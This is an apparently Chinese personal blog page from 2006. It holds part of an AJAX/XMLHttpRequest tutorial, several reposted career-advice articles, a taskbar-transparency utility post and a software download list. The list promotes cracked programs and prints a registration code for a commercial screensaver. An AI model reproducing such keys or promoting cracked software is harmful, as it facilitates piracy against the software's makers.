(上例对代码做了一定简化,这是为了解释如何创建XMLHTTP类实例. 实际的代码实例可参阅本篇步骤3.)
如果服务器的响应没有XML mime-type header,某些Mozilla浏览器可能无法正常工作. 为了解决这个问题, 如果服务器响应的header不是text/xml,可以调用其它方法修改该header.
http_request = new XMLHttpRequest(); http_request.overrideMimeType('text/xml');
接下来要决定当收到服务器的响应后,需要做什么.这需要告诉HTTP请求对象用哪一个JavaScript函数处理这个响应.可以将对象的onreadystatechange属性设置为要使用的JavaScript的函数名,如下所示:
http_request.onreadystatechange = nameOfTheFunction;
注意:在函数名后没有括号,也无需传递参数.另外还有一种方法,可以在扉页(fly)中定义函数及其对响应要采取的行为,如下所示:
http_request.onreadystatechange = function(){ // do the thing };
在定义了如何处理响应后,就要发送请求了.可以调用HTTP请求类的open()和send()方法, 如下所示:
http_request.open('GET', 'http://www.example.org/some.file', true); http_request.send(null);
open()的第一个参数是HTTP请求方式 ? GET, POST, HEAD 或任何服务器所支持的您想调用的方式. 按照HTTP规范,该参数要大写;否则,某些浏览器(如Firefox)可能无法处理请求.有关HTTP请求方法的详细信息可参考http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html W3C specs 第二个参数是请求页面的URL.由于自身安全特性的限制,该页面不能为第三方域名的页面.同时一定要保证在所有的页面中都使用准确的域名,否则调用open()会得到"permission denied"的错误提示.一个常见的错误是访问站点时使用domain.tld,而当请求页面时,却使用www.domain.tld. 第三个参数设置请求是否为异步模式.如果是TRUE, JavaScript函数将继续执行,而不等待服务器响应.这就是"AJAX"中的"A". 如果第一个参数是"POST",send()方法的参数可以是任何想送给服务器的数据. 这时数据要以字符串的形式送给服务器,如下所示:
name=value&anothername=othervalue&so=on
步骤 2 ? "收到!" --- 处理服务器的响应
当发送请求时,要提供指定处理响应的JavaScript函数名.
http_request.onreadystatechange = nameOfTheFunction;
我们来看看这个函数的功能是什么.首先函数会检查请求的状态.如果状态值是4,就意味着一个完整的服务器响应已经收到了,您将可以处理该响应.
if (http_request.readyState == 4) { // everything is good, the response is received } else { // still not ready }
readyState的取值如下: 0 (未初始化) 1 (正在装载) 2 (装载完毕) 3 (交互中) 4 (完成)
接着,函数会检查HTTP服务器响应的状态值. 完整的状态取值可参见 W3C site. 我们着重看值为200 OK的响应.
if (http_request.status == 200) { // perfect! } else { // there was a problem with the request, // for example the response may be a 404 (Not Found) // or 500 (Internal Server Error) response codes }
在检查完请求的状态值和响应的HTTP状态值后, 您就可以处理从服务器得到的数据了.有两种方式可以得到这些数据:
http_request.responseText ? 以文本字符串的方式返回服务器的响应 http_request.responseXML ? 以XMLDocument对象方式返回响应.处理XMLDocument对象可以用JavaScript DOM函数
步骤 3 ? "万事俱备!" - 简单实例
我们现在将整个过程完整地做一次,发送一个简单的HTTP请求. 我们用JavaScript请求一个HTML文件, test.html, 文件的文本内容为"I'm a test.".然后我们"alert()"test.html文件的内容.
<script type="text/javascript" language="javascript"> var http_request = false; function makeRequest(url) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,... http_request = new XMLHttpRequest(); if (http_request.overrideMimeType) { http_request.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } }
if (!http_request) { alert('Giving up :( Cannot create an XMLHTTP instance'); return false; } http_request.onreadystatechange = alertContents; http_request.open('GET', url, true); http_request.send(null);
}
function alertContents() {
if (http_request.readyState == 4) { if (http_request.status == 200) { alert(http_request.responseText); } else { alert('There was a problem with the request.'); } }
} </script> <span style="cursor: pointer; text-decoration: underline" onclick="makeRequest('test.html')"> Make a request </span>
本例中: 用户点击浏览器上的"请求"链接; 接着函数makeRequest()将被调用.其参数 ? HTML文件test.html在同一目录下; 这样就发起了一个请求.onreadystatechange的执行结果会被传送给alertContents(); alertContents()将检查服务器的响应是否成功地收到,如果是,就会"alert()"test.html文件的内容.
步骤 4 ? "X-文档" --- 处理XML响应
在前面的例子中,当服务器对HTTP请求的响应被收到后,我们会调用请求对象的reponseText属性.该属性包含了test.html文件的内容.现在我们来试试responseXML属性.
首先,我们新建一个有效的XML文件,后面我们将使用这个文件.该文件(test.xml)源代码如下所示:
<?xml version="1.0" ?> <root> I'm a test. </root>
在该脚本中,我们只需修改请求部分:
... onclick="makeRequest('test.xml')"> ...
接着,在alertContents()中,我们将alert()的代码alert(http_request.responseText);换成:
var xmldoc = http_request.responseXML; var root_node = xmldoc.getElementsByTagName('root').item(0); alert(root_node.firstChild.data);
这里,我们使用了responseXML提供的XMLDocument对象并用DOM方法获取存于XML文件中的内容.
|
|
|
|
| |
| | |
posted @
2006-10-18 11:47 MEYE 阅读(366) |
评论 (0) |
编辑 收藏
摘要: 发表文章
2006年中...
阅读全文
posted @
2006-08-28 15:53 MEYE 阅读(2234) |
评论 (0) |
编辑 收藏
摘要: 发表文章
一位IT研发...
阅读全文
posted @
2006-08-28 15:40 MEYE 阅读(3379) |
评论 (1) |
编辑 收藏
|
2006-07-25 07:43:08
|
广告媒体业注重复合型人才 某猎头总裁表示,从去年底开始一个很突出的变化是,媒体广告行业开始大规模使用猎头服务,包括客户总监、媒体策划等职位的高级人才都是这个行业急于猎取的对象。具体说来,从事媒体广告行业的人才应该成为“创意+外语”的广告人和“网络+专才”的媒体人。媒体人才现在最需要的是不仅仅只是拥有新闻专业知识,同时需要掌握另外一门学科基本知识的复合型专业人才。 此外规模较大的民营企业,也加快了网罗人才的步伐。 三类电信人才成主要争夺目标 而电信行业一改前两年的低迷情况,大规模招聘3G人才。从研发、项目管理、技术经理、成本控制、项目流程管理等各个环节的人才都是电信行业猎捕的对象。据有关专家介绍,具体来讲,电信行业对人才的需求主要集中在三个方面。一是创新型通信技术人才继续成为需求的热点;二是市场营销人才的需求快速升温,因此,既懂电信技术,又懂市场营销的人才需求会逐步升温,市场营销专业的毕业生将越来越走俏电信人才市场;三是统揽全局的复合型管理人才成为争夺的对象,因此,统领全局的、既懂技术又具有市场经济与新经济、新思维的,会管理的开拓型复合型人才是各企业追逐的对象。 制药业人才难觅 随着人们生活水平的提高,人们对药品质量、品种、数量和医疗技术、医疗条件的要求也越来越高。在科技迅速发展的今天,从行业整体发展的趋势来看,以高科技开发为依托的医药行业属于“朝阳产业”,将始终表现出良好的成长性。但不少知名的跨国医药公司,竟然招募不到合适的人员,而其本身的人才流失也非常严重。所以药科类(调整后共分药学、中药学、药物制剂三个专业)毕业生的就业普遍看好,总体上供小于求。另外,医药的贸易、经销、检验和医药信息管理对专业技术人员需求也会增加。 物流业急需三类人才 物流规划咨询人才、物流外向型国际人才和物流科研人才是目前物流业急需的人才。 目前城市物流系统要改造,企业物流系统、行业物流系统要改造,物流园区、配送中心要规划设计,这些工作都要靠规划咨询人才,这种复合型人才要求很高。目前这种人才最紧缺,培养的难度也最大。 中国加入WTO后,必须遵守国际通行的市场规划,按国际惯例进行运作,这就要求物流企业的员工都要熟悉现代物流理念和现代物流管理。而且,随着中国逐步成为世界制造中心,全球采购与销售网络的形成将带动庞大的国际物流系统,这就要求企业必须要储备一大批精通进出口贸易、海关业务、采购系统、供应链管理、国际法的物流人才,靠他们实现中国商品与国际市场的全面接轨。 此外,从业人员都是从传统运输、仓储行业转变过来的,在中国,目前还没有一个绝对的权威能把物流理论系统化。已经有很多学者认识到,中国物流理论与物流技术的落后直接与国内缺少物流科研人员有关,这个瓶颈问题不解决,“繁荣”都只能停留在表面。 零售业管理人才稀缺 国内零售行业管理人才一向稀缺。目前世界知名品牌要抢占中国市场,纷纷招兵买马,意在全国开设多家连锁店,所以零售行业管理人才的需求极大。统计资料表明,目前零售业一方面普通从业人员过剩,一方面适应现代商业零售业需要的综合人才不足。来自人才市场的信息也证明了这一点。今年以来,零售业人才,特别是其中的销售人才一直稳居需求的前三甲,但在实际招聘中,复合营销人员、零售店长、营销策划人才往往紧缺。 汽车行业高级人才备受关注 汽车和房地产行业依旧炙手可热。汽车行业不仅关注应届毕业生,更需要各种高级人才,包括研发、生产、销售、质量控制等各个环节的人才。而目前国内汽车企业最缺的就是复合型职业经理人。优秀的汽车产业管理人员往往需要具备汽车技术、营销、管理等综合技能,而高级管理人员除此之外,还需要具有战略管理能力。另外,高级技师也是要重点引进、培养的人才。 房产行业关注顶级销售人才 房地产行业目前很需要高端产品的顶级销售人才,而薪酬和机会增长最快的职业为三类:一类是独立操作房产项目的总经理,他们一般需要有10年左右的房产从业经验;第二类是进行房产项目定位、产品定位的人员,如总建筑师、营销总监类;另外,由于房产信贷政策变动后,融资压力增大,具有资本运作方面经验的人才也将受到重视。 此外,房地产业的延伸型人才,如房地产评估、经纪和物业管理等行业以及相关行业中的建材、装修材料、房地产工程、工程监理等的人才缺口较大。
出处:新闻晨报
|
|
|
2006-07-24 08:06:13
|
文/梁娟
经朋友较介绍,我有幸和北大的一位博士进行了一次电话聊天。他是主攻行政法的,在和他通话的前一天,他刚刚通过博士论文的答辩。虽然只是一次短短的电话聊天,但却获益匪浅。对于法学这个专业来说,现在就业越来越难,如果仅仅靠本科文凭是很难找到工作的,而读研究生可以让自己的起点比别人高些。虽然考研的人也很多,也会容易产生跟风的念头,但从我自身来说,确实是适合我的一个选择。
经过整理我们的谈话内容,总结出以下的建议:
首先,关于选择学校。他说觉得最好是选择名校。尤其本科是在二类或者三类的学校读的同学。名校的氛围以及那些师生的思想都对你的视野和成长很大的益处。当然也要根据自己大体的实力水平。如果你觉得慎重的话就选择比较有把握的学校;如果你觉得要对自己提出挑战的话就选择相对有些难考的学校,总之是因人而异。还有对学校的地域也要有所选择,比如我们就处在地缘优势很好的北京,可以考虑选择北京的学校。
其次,是对专业的选择。关键是兴趣。因为这是你要在以后的学习过程中深入研究的,而且很大程度上是与你以后从事的工作有密切关系的,因此只有自己有兴趣的才有可能进行深入学习。但也要注意结合自己的实力来做出选择。此外,对专业的选择还要结合以后要从事的工作来分析,从实用角度出发选择专业,除非你想搞研究,因为研究生毕业后还是要工作的。
第三,财力。考研不是一件好差事。报名、买资料、上辅导班都要花销大把银子。假如考中了,还得忍受3年清贫的书生生活。对一些家庭条件不是特别好的同学来说,是否要考研就不得不考虑经济条件了。因为万一考不上,不仅错过了找工作的最佳时机,更会加重经济负担。
第四,决定考研后就要注意地收集考研的信息,为考研做好准备。这可以从网上、师哥师姐的考研经验中得到。
对现在处于大二的同学来说,可以不必太心急,还是要将专业知识学好,为考研打下坚实基础。特别是英语,一定要把六级考过了。到大三就可以做出最后的决定,然后全力以赴的去准备。特别指出对英语的复习。如果英语基础不是很好的,就要提前开始复习考研词汇,以及注意其他的英语能力的提高。做到持之以恒。他建议我我从今年暑假开始就开始对大一、大二学习过的课程进行一次回忆性复习,不仅能可以对以后的专业课学习有帮助,更对考研有帮助。
最重要是学校和专业的选择,在你做出选择后就是复习考研的问题了。除专业知识的复习意外,特别强调心理战术和意志力。 主要注意以下几点:第一,必须要做好持久战的准备。考研并没有想象中的那么难。事实上,只要你有考研的决心,并有持之以恒的毅力,成功不在话下。 第二,必须要有良好的抗干扰能力。考研复习期间刚好与同学们找工作、考证有所冲突,所以如果你的基础比较差,学习效率也不怎么高的话,一定要保持良好的心态,不要受其他同学找工作或者考证的影响,必须要对考研充满信心。 第三,必须要保持有规律的生活状态。考研的过程很漫长,所以不能三天打鱼,两天晒网,制定一个适合自己的学习计划和作息时间表。 第四,必须要有耐心,切勿急功近利。学习是一个很漫长的过程,也许你一段时间的努力并不能带来分数的显著提高,但就跟哲学里说的一个道理一样:只有达到一定程度的量变才可能产生质的飞跃。努力必有回报,不要因为一时的学习效果不理想而对自己产生怀疑,考研不仅是考验你的学习能力,更是对你心理的一种考验。 这就是我从采访中得到的一点考研经验,这对我来说是很难得的。因为时间有限,所以聊的也不多。但在他的鼓励却给了我考研的信心和勇气,我会朝着自己的目标努力的,相信努力会有回报的。 文/梁娟 出处:大学生职业生涯规划论坛 http://blog.sina.com.cn/m/career
|
|
|
2006-07-24 07:44:07
|
几乎每个企业都需要技术人员的支持,生产制造型企业需要现场生产控制和工艺流程方面的技术人才;IT等高科技行业需要大量软件研发和设备维护的硬件工程师;房地产、建筑工程领域需要建筑设计师、土木工程师和施工技术人员。此外,不论是国企、民营企业还是外资公司,都需要大量的基础技术工人。甚至很多在豪华写字楼office内工作的白领,从事的工作都是和技术相关的。
不过,一个严峻的现实是,大量的技术类人员对自己的职业定位和职业生涯规划显得非常迷茫和困惑。中国有句古话:劳心者治人,劳力者治于人。与管理类岗位相比,技术人员往往被人看低一等,他们虽然从事着非常重要、繁琐的技术性工作,但更多的是扮演着幕后英雄的角色。在社会地位、经济收入方面与分光无限的各级管理层普遍存在差距,这一现实造就了技术人员的巨大心理落差。第二个造成职业规划困惑的原因是部分技术性工作的局限性。拿IT行业来说,由于技术和知识更新的速度太快,软件开放人员普遍被认为是吃"青春饭"的职位,谁学习的更快、谁的精力更旺盛、谁更能熬夜,谁就更有竞争力,因为这时经验已经不再重要。如果超过35岁还从事软件开发的话,将很难在本职岗位取得突破。
那么,对于技术类人员来说,难道他们的职业发展前景真的如此黯淡?事实当然不会如此悲观,做技术工作同样有着非常广阔的空间,当然,关键一点你要令自己的视野更开阔些,从长远的角度来看待这个问题。根据我的经验,技术人员的职业方向可以有以下几个选择:
方向一、成为项目经理
对于很多从事技术方面工作的人员来说,发展成为项目经理是一个相当好的工作。项目管理工作既需要扎实的技术背景支持,又涉及多方面的管理工作,最适合那些技术出身但又不甘于只做技术工作的人员。成为项目经理,一方面可以充分发挥技术人员的专业优势,同时又可在团队管理、协调各方资源、内外部沟通等工作中体验和发挥作为管理者的角色和作用,从而让自身价值更为充分的实现和得到认可。优秀的项目管理人才,也是今后很长时期内的一个热门职业方向。
方向二、成为行业资深专家
如果的确非常喜爱技术工作,而不擅长和喜欢与人沟通,则可以完全专注于自身的领域,以发展成为行业资深专家为方向和目标,当然,这一发展过程可能会比较漫长,任何一个领域的顶尖技术人才都需要长期的行业经验的累积和个人孜孜不倦的投入。不过这类人才的一个优势是越老越吃香,当别人随着年龄的逐步增长而开始担心饭碗问题时,你则渐入佳境,开始进入职业发展的黄金时期。
方向三、成为研发经理或技术总监
事实上,在某些行业和企业,技术研发人员的地位是非常高的。譬如在微软、诺基亚、华为等IT产业,技术的支持和研发的速度,成为企业利润增长的最主要来源,在这些行业,技术研发部门就是企业的主战场。在不少国企和政府部门,也非常重视科技和技术工作,例如,我所知道的广州市市政园林局,就设有总工程师、副总工程师等技术职位,其中总工程师的职务级别相当于副局级,在这种氛围影响下,技术岗位人才和行政领导同样受人尊敬。所以,在一个尊重和重视技术工作的行业和企业中,发展成为研发经理、技术总监或总工程师都是一个很好的选择。
方向四、做技术型销售和服务
技术工作的领域其实非常广泛,如果感觉纯技术工作发展潜力不大,可以考虑转向做销售或技术支持方面。华为、中兴等通信技术公司的销售人员,很少是不具有专业技术背景的;甲骨文等软件巨头的市场推广,第一步常常是从销售工程师拜访客户开始的。这类高价值、高科技的产品销售推广,非常需要具有丰富技术经验的销售人员。
技术人员转向售后服务,也是非常有前途的。我认识的一个朋友,大学是施工机械专业,毕业后一直在市政工程行业做非开挖顶管施工,在几年的工作中积累了丰富的地下顶进设备的应用和维修经验,一个合适的机会跳槽到著名的顶管设备生产商-德国海瑞克公司,成为其售后服务工程师,工作上得心应手,收入也有了数倍的增长。
方向五、转向管理岗位
总有一些人,虽然是理工科出身、从事着技术岗位工作,但他们似乎天生就是具有管理天赋的人。这些人会在工作中逐步展现出管理潜质和优秀的领导能力,他们往往更喜欢跟人打交道,更喜欢与外界沟通。在这种条件下,以技术经验为基础和依托,适当补充学习些管理方面的知识,例如可以在职攻读MBA,假以时日,完全可以成长为出色的职业经理人。
方向六、高级技术操作人员
刚才所谈的职业发展方向,适用群体多为高校理工专业出身的人士,但对于数量众多的中等专科学校、技校毕业的一线技术工人来说,成为行业技术专家或研发总监的机会显然非常微小。这一群体的职业人士,最佳的技术发展路线是立足本职岗位,成为高级操作型技术人员。
广州市2006年出台的各类岗位工资指导价格中,高级技师就业的工资比博士还要高出500元。出现这一现象的原因很简单,从全国层面来说,产业工人数量虽然巨大,但高级技工的比例却非常小,"高级技工"的缺乏已经成为制约许多企业发展的"瓶颈".但随着政策环境、企业认识角度和培育机制方面的不断改善,这一现象将逐步得到改变,所以成为中高级技师将是一个非常有前途的职业发展方向。
最后,我再次拿IT行业为例来具体谈谈技术人员的职业轨迹。 IT(Information Technology)行业的分类相当复杂,我这里仅仅分析最典型的三个部分:
第一部分是软件开发,通俗来说就是编程。
实际上我认为真正的软件开发人员和制鞋工厂中的工人处在一个地位,是企业产品的最终生产者(当然这里没有贬义)。
第二个部分是MIS: Management Information Service/System(管理信息系统),主要负责基础IT建设、网络、通讯、软硬件支持、简单开发等职能,为公司其他部门提供IT基础服务。
第三部分是ERP: Enterprise Resource Planning(企业资源计划系统),主要涉及企业管理类软件实施、维护、管理。通过是引入信息化手段在企业现实的实现企业的资源管理,协调企业各方面的生产运作,它对业务的规范和企业的管理机制有很大的依赖。
让我们来分别看看这三部分人员的职业发展空间:1. 开发人员我的观点是,在中小企业做纯粹的软件开发很可能走上一条不归路,长期从事开发的人一般处世能力不足,升任管理人员的机会不大。而还有一个更重要的问题是中国目前开发行业的环境很不好,正如我之前谈到的基本是在吃青春饭,30往后就很难做下去了。而在美国40岁的开发人员是正吃香的年龄。虽然可能业务越来越精,但可能会离IT越来越远,向纯蓝领工人发展。
如果真的要做开发,应该找一个更好的平台,最好是进入跨国企业或国内龙头企业。如果数据方面的技术很强,可以考虑转向互联网搜索方向;如果在电子和通信设备方面有优势,可以从简单的程序开发转向通信产品的开发。
2. MIS人员MIS内容广泛,可从事的职业很多:网管、技术支持等,而且通过努力可以得到提升成为小小的主管(当然要有自身的素质),进而成为MIS Manager,但做到MIS Manager基本也就到头了,不过倒是可以考虑转到不同的行业或企业做MIS.同样是做IT服务,在不同公司内IT部门的地位还是非常巨大的。就我所了解的,雅芳(中国)公司的IT部门就有100多人,在公司总部的各职能部门中的地位相当高;而南方航空公司的IT部门竟然达到800多人,这个规模已经远远超过一般的IT公司,其IT部门的总裁也是公司决策层的重要成员。所以,在这些公司内做IT技术支持工作,既避免了纯编程式的软件开发人员遇到的"人老珠黄"的被动局面,也不必担心IT产业泡沫破灭而产生的生存危机。
3. ERP类人员从事企业管理类软件的人员一般起点比较高(公司的起点就比较高),要求对财务、生产、销售等流程都有清楚地认识,从业人员不一定为IT出身,而有可能是财务人员或理工科人员等转行而来。IT的迅速发展和企业经营领域的不断拓展,为ERP的推广和发展创造了良好的发展空间。事实上,一个从事企业管理类软件的技术人员完全可以胜任一个企业的管理者,在这一领域技术人员的前景可以说是非常广阔的。
我认识的一位朋友,本科读的是工业装备控制专业,毕业后一直从事ERP方面的应用推广和管理咨询,虽然他对纯粹的IT技术了解并不是特别深刻,但在ERP系统在企业中的应用方面经验非常丰富,在别人眼中他更像是一名管理咨询师,五年下来已经是这一领域的专家级人物,在个人收入方面也非常可观。
出处:中人网 2006年7月21日作者:滦福田
|
|
|
2006-07-22 07:09:55
|
90.5%的人在竞争中遇到职业危机
本报最新调查显示,造成职业危机的主要原因是“竞争压力大”(82.1%)、 “发展空间小”(77.3%)和“超负荷工作”(47.9%)
“都这么累了,为什么还要这么紧张地工作?为什么不让自己放松一下?” “不行啊,我这个职位很多人盯着呢,稍有懈怠就会被人挤掉。” 这是北京师范大学心理学院教授许燕在某合资公司调研时,与一位部门主管的对话。这位部门主管告诉许燕,在公司,老板眼中的员工必须是时刻努力工作的,否则稍有松懈,老板就会找一个工作劲头更足的家伙来取代。 许燕发现,在这家公司,有很多30多岁的女性都还是单身,她们的办公室内都常备着一个旅行箱,以备随时被老板派遣出差。她们几乎没有娱乐休闲,每天除了吃饭睡觉,剩下的时间基本上都在工作。 “我们都不敢考虑个人问题,不敢谈恋爱,危机感太严重了,生怕哪天就因为工作不够努力被别人取代。”这些女性这样说。 “工作的目的是为了更好地生活,现在反过来了,人们生活是为了工作。”许燕感慨。 近日,中国青年报社会调查中心与新浪新闻中心合作进行了一项调查(4652人参加),结果显示,90.5%的人出现过职业危机。这也就是说,只有不到一成的人能够在泰然的状态下工作。 这似乎是个“人人自危”的年代。 32岁的张哲已经工作8年了。8年的职场经历总体来看非常顺利,除了两次职业危机之外。 学了4年市场营销,张哲毕业后的第一份工作是在国内某知名药业集团公司做保健品销售。他对工作充满热情,年轻又富有激情,凭借着聪明好学,很快就做得有声有色,销售业绩直线上升,被评为销售标兵和明星员工,并得到了公司的嘉奖。 很快,张哲觉得自己的沟通交流能力、管理能力,以及对销售流程各个环节的认识都有长足的进步。不久,他就从一线销售人员成为国内地区分公司销售部经理。可就在这个时候,张哲的第一次职业危机出现了。 “由于药业集团在本领域具有垄断性质,各方面效益也比较稳定,当上经理后我才发现,其实自己的发展空间很小,总是在重复以往的工作。我很担心自己的能力停滞不前。” 由于不愿意“混”到退休,张哲决定跳槽。很顺利,一家药业公司重金邀请他加盟,并许诺如果表现出色,半年内可以让他担任公司副总裁。“可真正到了公司我才发现,事实并不像想象的那么好。” 公司并没有让张哲负责市场开拓工作,而是利用他长期积累的人际关系来获取利润。至于他倾心打造的组织构架、产品推广以及销售队伍的建立,并没有得到认可。 “更糟糕的是,我的到来并没有使公司业绩得到明显改变。”这时,领导渐渐对张哲的工作表现不满意了。“我原本希望自己能再一次获得提升的机会,但这个愿望没有实现。”第一次职业危机刚过,张哲的第二次职业危机接踵而至。 本次调查发现,造成职业危机的主要原因依次是竞争压力大(82.1%)、发展空间小(77.3%)和超负荷工作(47.9%)。 “职业危机是社会发展到一定阶段带来的现象。”许燕说,过去端“铁饭碗”的时候,大家都有稳定的工作,安全感很强,根本谈不上什么职业危机。现在不同了,社会竞争激烈,找工作非常困难,失业者数量的增加无形中也使在职人员感受到越来越大的压力。 2003年,曾有一项针对跨国公司高层的调查:如果他们可以在一夜之间将公司中的所有“无用”员工都裁掉,他们会裁掉多少?调查出的数字让人不寒而栗:这一比例在60%~90%。 许燕认为,我国的经济、社会发展正处在一个爬坡的阶段,在这个阶段,人们更容易出现职业危机。 “有工作的人会有职业危机,没有工作的人也有职业危机。”许燕分析说,没有工作的人对职业有着强烈的渴求,会转换成生存危机,也就是说,有工作就意味着生存,没工作则预示着危机。 许燕认为,职场上的人在不同阶段会有不同的职业危机状况,有些人甚至会出现持续性职业危机。“这种情况主要出现在流动性强、竞争激烈的岗位,比如IT业。” 在许燕看来,似乎有两类人更容易出现职业危机:一类是初入职场的新人,另一类则是处在事业上升期的人。初入职场的新人有一个对工作的适应阶段,一般会有“我能不能胜任这份工作,能否把这个职位稳定住”的危机感。而事业发展到了一定阶段时,往往年龄也到了一个“坎儿”,这个时候能否在职位上、薪水上有一个飞跃,则成为很多人不得不面对的危机。 在人才市场和招聘会上,不少人都会注意到,绝大多数单位对应聘者都会有一个年龄要求:35周岁以下。这也在某种程度上表明,35岁是个“坎儿”,要升职、要换工作得趁早。 有意思的是,调查结果刚好印证了这一点。调查表明,37.6%的人认为,30~35岁是职场危机最容易产生的年龄段,接下来依次是36~40岁(24.0%)、30岁以下(14.9%)。 “对岗位要求的适应、对工作稳定性的要求、面临挑战性的工作,这是职业危机产生的常见表现。”许燕说。 调查表明,对自己的前途产生怀疑(76.8%)、工作热情下降(65.8%)、职位上升危机(49.0%)、年龄恐慌(47.8%)、健康状况下降(39.0%)、来自新人的冲击(38.1%),这些都是人们感同身受的职场危机表现。 许燕认为,出现职业危机的时候,一定不要恐慌,因为这种情况绝大多数人都会遇到,不要轻易否定自己,而应该采取积极的处理方式。 “比如说,可以了解自己对工作的匹配度。”许燕说,假设一个工作岗位要求10种能力,而你已经具备了8种能力,那么就应该考虑能否通过学习的途径把另外两种能力补齐。而如果仅仅具备两种能力,那么最好的办法就是放弃这份工作,寻找另一份适合自己的工作。 出处:中国青年报 2006-07-17 李松涛
|
|
posted @
2006-08-28 15:21 MEYE 阅读(867) |
评论 (0) |
编辑 收藏
摘要: 发表文章
[原创]选择...
阅读全文
posted @
2006-08-28 15:08 MEYE 阅读(3525) |
评论 (0) |
编辑 收藏
NASA World Wind v1.3.5
软件类型: 3D地图
软件语言: 中文
软件大小: 58 MB
软件简介:
NASA World Wind 俗称地球放大镜,是NASA(美国)国家航空和宇宙航行局
联合出品,类似Earthview 3D的鸟瞰工具,更加权威而且目前完全免费。透过这
套程序的3D引擎,可以让你从外太空看见地球上的任何一个角落。结合在线的资
料库,World Wind最高的解析度可以达到每象素代表15公尺,也就是说一些比较
大的街道可以看得一清二楚,而且包括了可见光以外得影像。此外,透过其中的
功能,你可以进行一趟地球的3D飞行之旅,体验飞过圣母峰的感觉。另外透过及
时动画形成的模组你可以即时体验飓风如果席卷佛罗里达州或者是气候变化情况。
进入下载
相关关键字:
earth
google
nasa
wind
world
盛宴
平民
风景
世界
posted @
2006-07-14 15:23 MEYE 阅读(3228) |
评论 (6) |
编辑 收藏
不用主题软件:XP实现Vista玻璃效果
分类:技术论坛
今天开始被破解的WinBlinds 5不能用了, 所以笔者就发个以前写的小程序, 这个小程序的主要功能就是让任务栏和开始菜单透明, 就像Vista一样。
它可以设定为开机自动透明, 但是程序不会一直占用系统资源, 运行一次就会自动退出. 其实这东西没什么技术含量, 笔者索性就开源了。
如果各位实在不放心的话, 可以下载源代码, 看看这程序究竟在后台干了些啥工作。
如果你是第一次使用, 请运行 GTaskbar.exe. 接下来选择透明就行了, 然后可以放心的关闭程序, 不会影响效果。
如果你以后再想透明的话, 直接运行 Redraw.exe 即可, Redraw.exe 这个程序没有界面, 后台运行 (就是把任务栏或者开始菜单透明) 后会自己结束进程, 之后完全不占用系统资源。
透明菜单预览图 1 (+上图可点击放大)
开机自动透明的原理, 其实也就是开机自动执行一次 Redraw.exe。Windows 2000 下应该同样可以使用这个程序。
笔者共享了主要的代码, 高手应该一看就明白。各位要是喜欢的话可以根据源代码自己订制, 随便改就是了, 没关系的。源程序写得很简单, 但还是欢迎各位报告BUG. 另请高人指点一二, 见笑了。
透明菜单预览图 2 (+上图可点击放大)
注意: 开始菜单变黑的, 这个应该不是我的问题, 因为大多数人使用都一切正常. 一般来说, 变黑以后换个主题就能恢复. XP 对透明函数的支持肯定不如 Vista, 笔者也没办法。
避免变黑的方法是改变主题后不要急着点透明, 先点击几次开始菜单, 不行的话可以多试几次.
透明后不能改变任务栏大小的朋友, 可以先把任务栏拖动到左右两侧, 再拖到最下面, 应该就可以了。
相关下载:透明程序执行文件(RAR格式) 程序源文件(RAR格式)
你可以通过这个链接引用该篇文章:http://yanfeiyanfei.bokee.com/tb.b?diaryId=10691044
posted @
2006-07-09 13:58 MEYE 阅读(674) |
评论 (2) |
编辑 收藏
【推荐】八月廿八★惟选精品★最爱这10款★
绝对逼真!!!破解屏保
Goldfish Aquarium v1.0
软件大小: 2.77 MB
Goldfish Aquarium 是LifeGlobe 公司生产的一流产品。加强并改进了Marine
Aquarium方面的技术。Goldfish Aquarium 可以让你知道你的计算机的最近状态
和功率。其动态的画面,逼真的,惊人的动画是在这款软件的最新的提高。下载
安装就能认可这是符合用户要求的最完美的产品。
Code:25ahb-2v3t2-2kw3m-nnhfq
点此下载
世界第一的ftp工具
FlashFXP v3.3.0 Beta 汉化版
软件大小: 2.02 MB
功能强大的 FXP / FTP软件,融合了一些其他优秀 FTP软件的优点,如像 CuteFTP
一样可以比较文件夹,支持彩色文字显示;像 BpFTP支持多文件夹选择文件,能
够缓存文件夹;像 LeapFTP一样的外观界面,甚至设计思路也差相仿佛。支持文
件夹(带子文件夹)的文件传送、删除;支持上传、下载及第三方文件续传;可
以跳过指定的文件类型,只传送需要的文件;可以自定义不同文件类型的显示颜
色;可以缓存远端文件夹列表,支持FTP 代理及 Socks 3 & 4;具有避免空闲功
能,防止被站点踢出;可以显示或隐藏“隐藏”属性的文件、文件夹;支持每个
站点使用被动模式等。!
点此下载
说实话,播放VCD,DVD他绝对是首选
豪杰超级解霸 V9.1 Build 0812
软件大小: 36.58 MB
精湛的DAC 音频技术—聆听自然重现的天籁之音 DAC格式依据自然声学模型
进行音频编码,压缩解压CPU 占用率低,系统资源消耗小,85%-99% 的CD无损质
量,挑战音频压缩技术的极限,逼真重现高品质音频效果,音效几乎和CD没有区
别。使用DAC 工具集( DAC提取、制作和专辑)能让您轻松制作出高品质的DAC
音乐
点此下载
萝卜青菜随你喜爱
FireTV烈火网络电视 V4.5 绿色完美破解版
软件大小: 791 KB
《FireTV烈火网络电视》是一款优秀的卫星电视播放软件,目前拥有1000多
台卫星频道播放权。自设卫星接收服务器,采用倍压编码技术,带宽减少一倍,
并将试用用户与正式用户线路分离,保证了正式用户的流畅观看。
点此下载
网络电视佼佼者
雷神高清晰数字网络电视2005(HDNTV) V3.31.5841 绿色完美破解版
软件大小: 1024 KB
身在异乡的您想看家乡的电视台节目吗?身在办公室的您不想错过精彩赛事
怎么办?您是否觉得有线电视节目太有限?如果您是宽带上网,通过HDNTV-高清
晰数字网络电视软件,一切随心所欲。
点此下载
目前播放器最火的一个是kmplayer,另一个就是他了
千千静听(Mp3随身听) v4.5.2+豪华全功能版
软件大小: 1.9 MB
一个集播放、音效、转换、歌词等多种功能于一身的国产专业音频播放软件。
点此下载
绝对是最强的系统优化工具
TuneUp Utilities 2004 汉化绿色版
软件大小: 6.71 MB
德国系统调校工具第一品牌 - TuneUp Utilities ,继 TuneUp 97在德国大
卖三十几万份之后,再度推出 TuneUp Utilities 企图攻占系统调整工具国际市
场!TuneUp Utilities的功能应有尽有,主要工具包括:系统改造/ 分析、硬盘
/ 登录文件清理、系统加速、记忆体最佳化、登录文件编辑、软件卸载、工作管
